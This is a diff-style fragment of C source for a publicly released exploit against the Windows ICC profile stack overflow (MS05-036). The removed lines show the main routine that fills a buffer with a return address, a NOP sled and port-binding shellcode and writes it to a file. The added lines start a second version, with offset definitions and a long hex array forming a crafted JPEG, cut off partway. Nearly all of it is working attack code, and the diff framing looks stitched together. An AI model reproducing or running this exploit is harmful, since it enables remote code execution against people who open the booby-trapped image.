-printf("%.2X ", (unsigned char) pbuf[i]);
-if( (i+1) %16 == 0)
-putchar('\n');
-}
-
-return;
-}
-
-void buildfile()
-{
-int i=0;
-FILE *fd;
-
-if ((fd=fopen(FNAME,"wb"))==NULL) {
-err_exit("-> Failed to generate file...");
-}
-
-for(;i '%s' generated.\n",FNAME);
-printf("-> shellcode binds 3334 port.\n");
-
-}
-
-void dword_revert(char * p,unsigned int size)
-{
-DWORD * ptr = &p;
-int i = 0;
-char * q = p + size; //end
-
-for(; p <= q; p +=4)
-{
-*p ^= *(p+3);
-*(p+3) ^= *p;
-*p ^= *(p+3);
-
-*(p+1) ^= *(p+2);
-*(p+2) ^= *(p+1);
-*(p+1) ^= *(p+2);
-}
-
-
-return;
-}
-
-void list_target()
-{
-unsigned int i = 0 ;
-
-printf("\nTargets \t\t\n");
-while(targets[i].jmpADD != NULL){
-printf("#%d\t%s\n", i+1, targets[i].os);
-i++;
-}
-return;
-}
-
-
-
-int main(int argc, char *argv[])
-{
-int i=0, t=TARGET, size=0;
-int shal = 0;
-unsigned int sc_size = strlen(shellcode);
-unsigned int tag_size = stack_land_offset - tag_content_offset + 1 + sc_size ;
-long fRetaddr = 0x00;
-
-if (argc < 2) {
-printf("\n\n");
-
-printf("* Windows ICC stack overflow exploit (MS05-36)\n");
-printf("* Code Execution Exploit\n");
-printf("* (c) Darkeagle [ private code ]\n");
-printf("* usage -> ms05-036  (jmp/call esp)\n");
-list_target() ;
-exit(0);
-}
-
-t=atoi(argv[1]);
-
-if ( argc == 3 )
-sscanf(argv[2], "0x%x", &fRetaddr);
-
-memset(buff + tag_content_offset, 0x90,tag_size);
-
-*(DWORD*)(buff + no_access_violate2) = t2b(targets[t-1].writeable_add);
-*(DWORD*)(buff + no_access_violate)  = t2b(0x4);
-if ( fRetaddr == 0x00 )
-{
-*(DWORD*)(buff + ret_addr_offset)    = t2b(targets[t-1].jmpADD);
-} else {
-*(DWORD*)(buff + ret_addr_offset)    = t2b(fRetaddr);
-}
-strncpy(buff + stack_land_offset, shellcode, sc_size);
-dword_revert(buff + stack_land_offset, sc_size);
-
-tag_size = (tag_size >> 2 << 2) + 4;
-printf("current size: 0x%.8X\n",tag_size);
-*(DWORD*)(buff + content_size_offset) = t2b(tag_size);
-
-buildfile();
-
-return 0;
-
-}
-
-// milw0rm.com [2006-02-17]
+/*
+\		MS05-036 ICC Stack Overflow Exploit
+/				by Darkeagle
+\
+/	GreetZ:	all unl0ckerz, ed, f0st, uf0, sowhat, str0ke, #black, redsand
+\
+/
+\		special tnx to snooq for his PoC.
+/		
+\		
+/	xploit was tested on WinXP SP1 RUS with explorer.exe
+\
+/	02.08.05
+\
+/	http://eagle.blacksecurity.org
+\		
+*/
+
+#include 
+#include 
+#include 
+
+#define TARGET 1
+#define NOP 0x90
+#define FNAME "eagl3.jpg"
+#define BSIZE sizeof(buff)-1
+#define EIP_OFFSET 0x3A0
+#define SC_OFFSET 0x246
+#define NOP_OFFSET 0x218
+#define NOP_SIZE 0x112
+
+#define tag_content_offset 0x23E // file buffer offset craft stuff
+#define content_size_offset 0xE2 // tag content buffer size
+#define no_access_violate 0x32E // avoid access violate
+#define no_access_violate2 0x32E+12 // avoid access violate
+#define stack_land_offset ret_addr_offset+16 // reture address offset
+#define ret_addr_offset no_access_violate+8 // reture address offset
+
+/*
+* Silly JPEG stuffed with ICC profile.........
+*/
+
+char buff[]=
+"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x00\x01\x00\x60"
+"\x00\x60\x00\x00\xFF\xE2\x0C\x58\x49\x43\x43\x5F\x50\x52\x4F\x46"
+"\x49\x4C\x45\x00\x01\x01\x00\x00\x0C\x48\x4C\x69\x6E\x6F\x02\x10"
+"\x00\x00\x6D\x6E\x74\x72\x52\x47\x42\x20\x58\x59\x5A\x20\x07\xCE"
+"\x00\x02\x00\x09\x00\x06\x00\x31\x00\x00\x61\x63\x73\x70\x4D\x53"
+"\x46\x54\x00\x00\x00\x00\x49\x45\x43\x20\x73\x52\x47\x42\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF6\xD6\x00\x01"
+"\x00\x00\x00\x00\xD3\x2D\x48\x50\x20\x20\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x63\x70\x72\x74\x00\x00"
+"\x01\x50\x00\x00\x00\x33\x64\x65\x73\x63\x00\x00\x01\x84\x00\x00"
+"\x00\x6C\x77\x74\x70\x74\x00\x00\x01\xF0\x00\x00\x00\x14\x62\x6B"
+"\x70\x74\x00\x00\x02\x04\x00\x00\x00\x14\x72\x58\x59\x5A\x00\x00"
+"\x02\x18\x00\x00\x00\xFC\x67\x58\x59\x5A\x00\x00\x02\x2C\x00\x00"
+"\x00\x14\x62\x58\x59\x5A\x00\x00\x02\x40\x00\x00\x00\x14\x64\x6D"
+"\x6E\x64\x00\x00\x02\x54\x00\x00\x00\x70\x64\x6D\x64\x64\x00\x00"
+"\x02\xC4\x00\x00\x00\x88\x76\x75\x65\x64\x00\x00\x03\x4C\x00\x00"
+"\x00\x86\x76\x69\x65\x77\x00\x00\x03\xD4\x00\x00\x00\x24\x6C\x75"
+"\x6D\x69\x00\x00\x03\xF8\x00\x00\x00\x14\x6D\x65\x61\x73\x00\x00"
+"\x04\x0C\x00\x00\x00\x24\x74\x65\x63\x68\x00\x00\x04\x30\x00\x00"
+"\x00\x0C\x72\x54\x52\x43\x00\x00\x04\x3C\x00\x00\x08\x0C\x67\x54"
+"\x52\x43\x00\x00\x04\x3C\x00\x00\x08\x0C\x62\x54\x52\x43\x00\x00"
+"\x04\x3C\x00\x00\x08\x0C\x74\x65\x78\x74\x00\x00\x00\x00\x43\x6F"
+"\x70\x79\x72\x69\x67\x68\x74\x20\x28\x63\x29\x20\x31\x39\x39\x38"
+"\x20\x48\x65\x77\x6C\x65\x74\x74\x2D\x50\x61\x63\x6B\x61\x72\x64"
+"\x20\x43\x6F\x6D\x70\x61\x6E\x79\x00\x00\x64\x65\x73\x63\x00\x00"
+"\x00\x00\x00\x00\x00\x12\x73\x52\x47\x42\x20\x49\x45\x43\x36\x31"
+"\x39\x36\x36\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x12\x73\x52\x47\x42\x20\x49\x45\x43\x36\x31\x39\x36\x36"
+"\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00"
+"\xF3\x51\x00\x01\x00\x00\x00\x01\x16\xCC\x58\x59\x5A\x20\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x58\x59"
+"\x5A\x20\x00\x00\x00\x00\x00\x00\x6F\xA2\x00\x00\x38\xF5\x00\x00"
+"\x03\x90\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00\x62\x99\x00\x00"
+"\xB7\x85\x00\x00\x18\xDA\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00"
+"\x24\xA0\x00\x00\x0F\x84\x00\x00\xB6\xCF\x64\x65\x73\x63\x00\x00"
+"\x00\x00\x00\x00\x00\x16\x49\x45\x43\x20\x68\x74\x74\x70\x3A\x2F"
+"\x2F\x77\x77\x77\x2E\x69\x65\x63\x2E\x63\x68\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x16\x49\x45\x43\x20\x68\x74\x74\x70\x3A"
+"\x2F\x2F\x77\x77\x77\x2E\x69\x65\x63\x2E\x63\x68\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x65\x73\x63\x00\x00"
+"\x00\x00\x00\x00\x00\x2E\x49\x45\x43\x20\x36\x31\x39\x36\x36\x2D"
+"\x32\x2E\x31\x20\x44\x65\x66\x61\x75\x6C\x74\x20\x52\x47\x42\x20"
+"\x63\x6F\x6C\x6F\x75\x72\x20\x73\x70\x61\x63\x65\x20\x2D\x20\x73"
+"\x52\x47\x42\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x04\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x65\x66"
+"\x61\x75\x6C\x74\x20\x52\x47\x42\x20\x63\x6F\x6C\x6F\x75\x72\x20"
+"\x73\x70\x61\x63\x65\x20\x2D\x20\x73\x52\x47\x42\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x64\x65\x73\x63\x00\x00\x00\x00\x00\x00\x00\x2C\x52\x65"
+"\x66\x65\x72\x65\x6E\x63\x65\x20\x56\x69\x65\x77\x69\x6E\x67\x20"
+"\x43\x6F\x6E\x64\x69\x74\x69\x6F\x6E\x20\x69\x6E\x20\x49\x45\x43"
+"\x36\x31\x39\x36\x36\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x2C\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x20\x56"
+"\x69\x65\x77\x69\x6E\x67\x20\x43\x6F\x6E\x64\x69\x74\x69\x6F\x6E"
+"\x20\x69\x6E\x20\x49\x45\x43\x36\x31\x39\x36\x36\x2D\x32\x2E\x31"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x69\x65\x77\x00\x00"
+"\x00\x00\x00\x13\xA4\xFE\x00\x14\x5F\x2E\x00\x10\xCF\x14\x00\x03"
+"\xED\xCC\x00\x04\x13\x0B\x00\x03\x5C\x9E\x00\x00\x00\x01\x58\x59"
+"\x5A\x20\x00\x00\x00\x00\x00\x4C\x09\x56\x00\x50\x00\x00\x00\x57"
+"\x1F\xE7\x6D\x65\x61\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x02\x8F\x00\x00\x00\x02\x73\x69\x67\x20\x00\x00\x00\x00\x43\x52"
+"\x54\x20\x63\x75\x72\x76\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00"
+"\x00\x05\x00\x0A\x00\x0F\x00\x14\x00\x19\x00\x1E\x00\x23\x00\x28"
+"\x00\x2D\x00\x32\x00\x37\x00\x3B\x00\x40\x00\x45\x00\x4A\x00\x4F"
+"\x00\x54\x00\x59\x00\x5E\x00\x63\x00\x68\x00\x6D\x00\x72\x00\x77"
+"\x00\x7C\x00\x81\x00\x86\x00\x8B\x00\x90\x00\x95\x00\x9A\x00\x9F"
+"\x00\xA4\x00\xA9\x00\xAE\x00\xB2\x00\xB7\x00\xBC\x00\xC1\x00\xC6"
+"\x00\xCB\x00\xD0\x00\xD5\x00\xDB\x00\xE0\x00\xE5\x00\xEB\x00\xF0"
+"\x00\xF6\x00\xFB\x01\x01\x01\x07\x01\x0D\x01\x13\x01\x19\x01\x1F"
+"\x01\x25\x01\x2B\x01\x32\x01\x38\x01\x3E\x01\x45\x01\x4C\x01\x52"
+"\x01\x59\x01\x60\x01\x67\x01\x6E\x01\x75\x01\x7C\x01\x83\x01\x8B"
+"\x01\x92\x01\x9A\x01\xA1\x01\xA9\x01\xB1\x01\xB9\x01\xC1\x01\xC9"
+"\x01\xD1\x01\xD9\x01\xE1\x01\xE9\x01\xF2\x01\xFA\x02\x03\x02\x0C"
+"\x02\x14\x02\x1D\x02\x26\x02\x2F\x02\x38\x02\x41\x02\x4B\x02\x54"
+"\x02\x5D\x02\x67\x02\x71\x02\x7A\x02\x84\x02\x8E\x02\x98\x02\xA2"
+"\x02\xAC\x02\xB6\x02\xC1\x02\xCB\x02\xD5\x02\xE0\x02\xEB\x02\xF5"
+"\x03\x00\x03\x0B\x03\x16\x03\x21\x03\x2D\x03\x38\x03\x43\x03\x4F"
+"\x03\x5A\x03\x66\x03\x72\x03\x7E\x03\x8A\x03\x96\x03\xA2\x03\xAE"
+"\x03\xBA\x03\xC7\x03\xD3\x03\xE0\x03\xEC\x03\xF9\x04\x06\x04\x13"
+"\x04\x20\x04\x2D\x04\x3B\x04\x48\x04\x55\x04\x63\x04\x71\x04\x7E"
+"\x04\x8C\x04\x9A\x04\xA8\x04\xB6\x04\xC4\x04\xD3\x04\xE1\x04\xF0"
+"\x04\xFE\x05\x0D\x05\x1C\x05\x2B\x05\x3A\x05\x49\x05\x58\x05\x67"
+"\x05\x77\x05\x86\x05\x96\x05\xA6\x05\xB5\x05\xC5\x05\xD5\x05\xE5"
+"\x05\xF6\x06\x06\x06\x16\x06\x27\x06\x37\x06\x48\x06\x59\x06\x6A"
+"\x06\x7B\x06\x8C\x06\x9D\x06\xAF\x06\xC0\x06\xD1\x06\xE3\x06\xF5"
+"\x07\x07\x07\x19\x07\x2B\x07\x3D\x07\x4F\x07\x61\x07\x74\x07\x86"
+"\x07\x99\x07\xAC\x07\xBF\x07\xD2\x07\xE5\x07\xF8\x08\x0B\x08\x1F"
+"\x08\x32\x08\x46\x08\x5A\x08\x6E\x08\x82\x08\x96\x08\xAA\x08\xBE"
+"\x08\xD2\x08\xE7\x08\xFB\x09\x10\x09\x25\x09\x3A\x09\x4F\x09\x64"
+"\x09\x79\x09\x8F\x09\xA4\x09\xBA\x09\xCF\x09\xE5\x09\xFB\x0A\x11"
+"\x0A\x27\x0A\x3D\x0A\x54\x0A\x6A\x0A\x81\x0A\x98\x0A\xAE\x0A\xC5"
+"\x0A\xDC\x0A\xF3\x0B\x0B\x0B\x22\x0B\x39\x0B\x51\x0B\x69\x0B\x80"
+"\x0B\x98\x0B\xB0\x0B\xC8\x0B\xE1\x0B\xF9\x0C\x12\x0C\x2A\x0C\x43"
+"\x0C\x5C\x0C\x75\x0C\x8E\x0C\xA7\x0C\xC0\x0C\xD9\x0C\xF3\x0D\x0D"
+"\x0D\x26\x0D\x40\x0D\x5A\x0D\x74\x0D\x8E\x0D\xA9\x0D\xC3\x0D\xDE"
+"\x0D\xF8\x0E\x13\x0E\x2E\x0E\x49\x0E\x64\x0E\x7F\x0E\x9B\x0E\xB6"
+"\x0E\xD2\x0E\xEE\x0F\x09\x0F\x25\x0F\x41\x0F\x5E\x0F\x7A\x0F\x96"
+"\x0F\xB3\x0F\xCF\x0F\xEC\x10\x09\x10\x26\x10\x43\x10\x61\x10\x7E"
+"\x10\x9B\x10\xB9\x10\xD7\x10\xF5\x11\x13\x11\x31\x11\x4F\x11\x6D"
+"\x11\x8C\x11\xAA\x11\xC9\x11\xE8\x12\x07\x12\x26\x12\x45\x12\x64"
+"\x12\x84\x12\xA3\x12\xC3\x12\xE3\x13\x03\x13\x23\x13\x43\x13\x63"
+"\x13\x83\x13\xA4\x13\xC5\x13\xE5\x14\x06\x14\x27\x14\x49\x14\x6A"
+"\x14\x8B\x14\xAD\x14\xCE\x14\xF0\x15\x12\x15\x34\x15\x56\x15\x78"
+"\x15\x9B\x15\xBD\x15\xE0\x16\x03\x16\x26\x16\x49\x16\x6C\x16\x8F"
+"\x16\xB2\x16\xD6\x16\xFA\x17\x1D\x17\x41\x17\x65\x17\x89\x17\xAE"
+"\x17\xD2\x17\xF7\x18\x1B\x18\x40\x18\x65\x18\x8A\x18\xAF\x18\xD5"
+"\x18\xFA\x19\x20\x19\x45\x19\x6B\x19\x91\x19\xB7\x19\xDD\x1A\x04"
+"\x1A\x2A\x1A\x51\x1A\x77\x1A\x9E\x1A\xC5\x1A\xEC\x1B\x14\x1B\x3B"
+"\x1B\x63\x1B\x8A\x1B\xB2\x1B\xDA\x1C\x02\x1C\x2A\x1C\x52\x1C\x7B"
+"\x1C\xA3\x1C\xCC\x1C\xF5\x1D\x1E\x1D\x47\x1D\x70\x1D\x99\x1D\xC3"
+"\x1D\xEC\x1E\x16\x1E\x40\x1E\x6A\x1E\x94\x1E\xBE\x1E\xE9\x1F\x13"
+"\x1F\x3E\x1F\x69\x1F\x94\x1F\xBF\x1F\xEA\x20\x15\x20\x41\x20\x6C"
+"\x20\x98\x20\xC4\x20\xF0\x21\x1C\x21\x48\x21\x75\x21\xA1\x21\xCE"
+"\x21\xFB\x22\x27\x22\x55\x22\x82\x22\xAF\x22\xDD\x23\x0A\x23\x38"
+"\x23\x66\x23\x94\x23\xC2\x23\xF0\x24\x1F\x24\x4D\x24\x7C\x24\xAB"
+"\x24\xDA\x25\x09\x25\x38\x25\x68\x25\x97\x25\xC7\x25\xF7\x26\x27"
+"\x26\x57\x26\x87\x26\xB7\x26\xE8\x27\x18\x27\x49\x27\x7A\x27\xAB"
+"\x27\xDC\x28\x0D\x28\x3F\x28\x71\x28\xA2\x28\xD4\x29\x06\x29\x38"
+"\x29\x6B\x29\x9D\x29\xD0\x2A\x02\x2A\x35\x2A\x68\x2A\x9B\x2A\xCF"
+"\x2B\x02\x2B\x36\x2B\x69\x2B\x9D\x2B\xD1\x2C\x05\x2C\x39\x2C\x6E"
+"\x2C\xA2\x2C\xD7\x2D\x0C\x2D\x41\x2D\x76\x2D\xAB\x2D\xE1\x2E\x16"
+"\x2E\x4C\x2E\x82\x2E\xB7\x2E\xEE\x2F\x24\x2F\x5A\x2F\x91\x2F\xC7"
+"\x2F\xFE\x30\x35\x30\x6C\x30\xA4\x30\xDB\x31\x12\x31\x4A\x31\x82"
+"\x31\xBA\x31\xF2\x32\x2A\x32\x63\x32\x9B\x32\xD4\x33\x0D\x33\x46"
+"\x33\x7F\x33\xB8\x33\xF1\x34\x2B\x34\x65\x34\x9E\x34\xD8\x35\x13"
+"\x35\x4D\x35\x87\x35\xC2\x35\xFD\x36\x37\x36\x72\x36\xAE\x36\xE9"
+"\x37\x24\x37\x60\x37\x9C\x37\xD7\x38\x14\x38\x50\x38\x8C\x38\xC8"
+"\x39\x05\x39\x42\x39\x7F\x39\xBC\x39\xF9\x3A\x36\x3A\x74\x3A\xB2"
+"\x3A\xEF\x3B\x2D\x3B\x6B\x3B\xAA\x3B\xE8\x3C\x27\x3C\x65\x3C\xA4"
+"\x3C\xE3\x3D\x22\x3D\x61\x3D\xA1\x3D\xE0\x3E\x20\x3E\x60\x3E\xA0"
+"\x3E\xE0\x3F\x21\x3F\x61\x3F\xA2\x3F\xE2\x40\x23\x40\x64\x40\xA6"
+"\x40\xE7\x41\x29\x41\x6A\x41\xAC\x41\xEE\x42\x30\x42\x72\x42\xB5"
+"\x42\xF7\x43\x3A\x43\x7D\x43\xC0\x44\x03\x44\x47\x44\x8A\x44\xCE"
+"\x45\x12\x45\x55\x45\x9A\x45\xDE\x46\x22\x46\x67\x46\xAB\x46\xF0"
+"\x47\x35\x47\x7B\x47\xC0\x48\x05\x48\x4B\x48\x91\x48\xD7\x49\x1D"
+"\x49\x63\x49\xA9\x49\xF0\x4A\x37\x4A\x7D\x4A\xC4\x4B\x0C\x4B\x53"
+"\x4B\x9A\x4B\xE2\x4C\x2A\x4C\x72\x4C\xBA\x4D\x02\x4D\x4A\x4D\x93"
+"\x4D\xDC\x4E\x25\x4E\x6E\x4E\xB7\x4F\x00\x4F\x49\x4F\x93\x4F\xDD"
+"\x50\x27\x50\x71\x50\xBB\x51\x06\x51\x50\x51\x9B\x51\xE6\x52\x31"
+"\x52\x7C\x52\xC7\x53\x13\x53\x5F\x53\xAA\x53\xF6\x54\x42\x54\x8F"
+"\x54\xDB\x55\x28\x55\x75\x55\xC2\x56\x0F\x56\x5C\x56\xA9\x56\xF7"
+"\x57\x44\x57\x92\x57\xE0\x58\x2F\x58\x7D\x58\xCB\x59\x1A\x59\x69"
+"\x59\xB8\x5A\x07\x5A\x56\x5A\xA6\x5A\xF5\x5B\x45\x5B\x95\x5B\xE5"
+"\x5C\x35\x5C\x86\x5C\xD6\x5D\x27\x5D\x78\x5D\xC9\x5E\x1A\x5E\x6C"
+"\x5E\xBD\x5F\x0F\x5F\x61\x5F\xB3\x60\x05\x60\x57\x60\xAA\x60\xFC"
+"\x61\x4F\x61\xA2\x61\xF5\x62\x49\x62\x9C\x62\xF0\x63\x43\x63\x97"
+"\x63\xEB\x64\x40\x64\x94\x64\xE9\x65\x3D\x65\x92\x65\xE7\x66\x3D"
+"\x66\x92\x66\xE8\x67\x3D\x67\x93\x67\xE9\x68\x3F\x68\x96\x68\xEC"
+"\x69\x43\x69\x9A\x69\xF1\x6A\x48\x6A\x9F\x6A\xF7\x6B\x4F\x6B\xA7"
+"\x6B\xFF\x6C\x57\x6C\xAF\x6D\x08\x6D\x60\x6D\xB9\x6E\x12\x6E\x6B"
+"\x6E\xC4\x6F\x1E\x6F\x78\x6F\xD1\x70\x2B\x70\x86\x70\xE0\x71\x3A"
+"\x71\x95\x71\xF0\x72\x4B\x72\xA6\x73\x01\x73\x5D\x73\xB8\x74\x14"
+"\x74\x70\x74\xCC\x75\x28\x75\x85\x75\xE1\x76\x3E\x76\x9B\x76\xF8"
+"\x77\x56\x77\xB3\x78\x11\x78\x6E\x78\xCC\x79\x2A\x79\x89\x79\xE7"
+"\x7A\x46\x7A\xA5\x7B\x04\x7B\x63\x7B\xC2\x7C\x21\x7C\x81\x7C\xE1"
+"\x7D\x41\x7D\xA1\x7E\x01\x7E\x62\x7E\xC2\x7F\x23\x7F\x84\x7F\xE5"
+"\x80\x47\x80\xA8\x81\x0A\x81\x6B\x81\xCD\x82\x30\x82\x92\x82\xF4"
+"\x83\x57\x83\xBA\x84\x1D\x84\x80\x84\xE3\x85\x47\x85\xAB\x86\x0E"
+"\x86\x72\x86\xD7\x87\x3B\x87\x9F\x88\x04\x88\x69\x88\xCE\x89\x33"
+"\x89\x99\x89\xFE\x8A\x64\x8A\xCA\x8B\x30\x8B\x96\x8B\xFC\x8C\x63"
+"\x8C\xCA\x8D\x31\x8D\x98\x8D\xFF\x8E\x66\x8E\xCE\x8F\x36\x8F\x9E"
+"\x90\x06\x90\x6E\x90\xD6\x91\x3F\x91\xA8\x92\x11\x92\x7A\x92\xE3"
+"\x93\x4D\x93\xB6\x94\x20\x94\x8A\x94\xF4\x95\x5F\x95\xC9\x96\x34"
+"\x96\x9F\x97\x0A\x97\x75\x97\xE0\x98\x4C\x98\xB8\x99\x24\x99\x90"
+"\x99\xFC\x9A\x68\x9A\xD5\x9B\x42\x9B\xAF\x9C\x1C\x9C\x89\x9C\xF7"
+"\x9D\x64\x9D\xD2\x9E\x40\x9E\xAE\x9F\x1D\x9F\x8B\x9F\xFA\xA0\x69"
+"\xA0\xD8\xA1\x47\xA1\xB6\xA2\x26\xA2\x96\xA3\x06\xA3\x76\xA3\xE6"
+"\xA4\x56\xA4\xC7\xA5\x38\xA5\xA9\xA6\x1A\xA6\x8B\xA6\xFD\xA7\x6E"
+"\xA7\xE0\xA8\x52\xA8\xC4\xA9\x37\xA9\xA9\xAA\x1C\xAA\x8F\xAB\x02"
+"\xAB\x75\xAB\xE9\xAC\x5C\xAC\xD0\xAD\x44\xAD\xB8\xAE\x2D\xAE\xA1"
+"\xAF\x16\xAF\x8B\xB0\x00\xB0\x75\xB0\xEA\xB1\x60\xB1\xD6\xB2\x4B"
+"\xB2\xC2\xB3\x38\xB3\xAE\xB4\x25\xB4\x9C\xB5\x13\xB5\x8A\xB6\x01"
+"\xB6\x79\xB6\xF0\xB7\x68\xB7\xE0\xB8\x59\xB8\xD1\xB9\x4A\xB9\xC2"
+"\xBA\x3B\xBA\xB5\xBB\x2E\xBB\xA7\xBC\x21\xBC\x9B\xBD\x15\xBD\x8F"
+"\xBE\x0A\xBE\x84\xBE\xFF\xBF\x7A\xBF\xF5\xC0\x70\xC0\xEC\xC1\x67"
+"\xC1\xE3\xC2\x5F\xC2\xDB\xC3\x58\xC3\xD4\xC4\x51\xC4\xCE\xC5\x4B"
+"\xC5\xC8\xC6\x46\xC6\xC3\xC7\x41\xC7\xBF\xC8\x3D\xC8\xBC\xC9\x3A"
+"\xC9\xB9\xCA\x38\xCA\xB7\xCB\x36\xCB\xB6\xCC\x35\xCC\xB5\xCD\x35"
+"\xCD\xB5\xCE\x36\xCE\xB6\xCF\x37\xCF\xB8\xD0\x39\xD0\xBA\xD1\x3C"
+"\xD1\xBE\xD2\x3F\xD2\xC1\xD3\x44\xD3\xC6\xD4\x49\xD4\xCB\xD5\x4E"
+"\xD5\xD1\xD6\x55\xD6\xD8\xD7\x5C\xD7\xE0\xD8\x64\xD8\xE8\xD9\x6C"
+"\xD9\xF1\xDA\x76\xDA\xFB\xDB\x80\xDC\x05\xDC\x8A\xDD\x10\xDD\x96"
+"\xDE\x1C\xDE\xA2\xDF\x29\xDF\xAF\xE0\x36\xE0\xBD\xE1\x44\xE1\xCC"
+"\xE2\x53\xE2\xDB\xE3\x63\xE3\xEB\xE4\x73\xE4\xFC\xE5\x84\xE6\x0D"
+"\xE6\x96\xE7\x1F\xE7\xA9\xE8\x32\xE8\xBC\xE9\x46\xE9\xD0\xEA\x5B"
+"\xEA\xE5\xEB\x70\xEB\xFB\xEC\x86\xED\x11\xED\x9C\xEE\x28\xEE\xB4"
+"\xEF\x40\xEF\xCC\xF0\x58\xF0\xE5\xF1\x72\xF1\xFF\xF2\x8C\xF3\x19"
+"\xF3\xA7\xF4\x34\xF4\xC2\xF5\x50\xF5\xDE\xF6\x6D\xF6\xFB\xF7\x8A"
+"\xF8\x19\xF8\xA8\xF9\x38\xF9\xC7\xFA\x57\xFA\xE7\xFB\x77\xFC\x07"
+"\xFC\x98\xFD\x29\xFD\xBA\xFE\x4B\xFE\xDC\xFF\x6D\xFF\xFF\xFF\xFE"
+"\x00\x1F\x4C\x45\x41\x44\x20\x54\x65\x63\x68\x6E\x6F\x6C\x6F\x67"
+"\x69\x65\x73\x20\x49\x6E\x63\x2E\x20\x56\x31\x2E\x30\x31\x00\xFF"
+"\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x03\x03"
+"\x02\x03\x04\x07\x04\x04\x03\x03\x04\x08\x06\x06\x05\x07\x0A\x09"
+"\x0A\x0A\x0A\x09\x0A\x09\x0B\x0C\x10\x0E\x0B\x0C\x0F\x0C\x09\x0A"
+"\x0E\x13\x0E\x0F\x11\x11\x12\x12\x12\x0B\x0D\x14\x15\x14\x12\x15"
+"\x10\x12\x12\x11\x01\x03\x03\x03\x04\x03\x04\x08\x04\x04\x08\x11"
+"\x0B\x0A\x0B\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
+"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
+"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
+"\x11\x11\x11\x11\x11\xFF\xC4\x01\xA2\x00\x00\x01\x05\x01\x01\x01"
+"\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05"
+"\x06\x07\x08\x09\x0A\x0B\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08"
+"\x09\x0A\x0B\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04"
+"\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06"
+"\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08\x23\x42\xB1\xC1"
+"\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17\x18\x19\x1A"
+"\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45"
+"\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65"
+"\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85"
+"\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3"
+"\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA"
+"\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8"
+"\xD9\xDA\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4"
+"\xF5\xF6\xF7\xF8\xF9\xFA\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07"
+"\x05\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31"
+"\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1"
+"\xB1\xC1\x09\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1"
+"\x25\xF1\x17\x18\x19\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39"
+"\x3A\x43\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59"
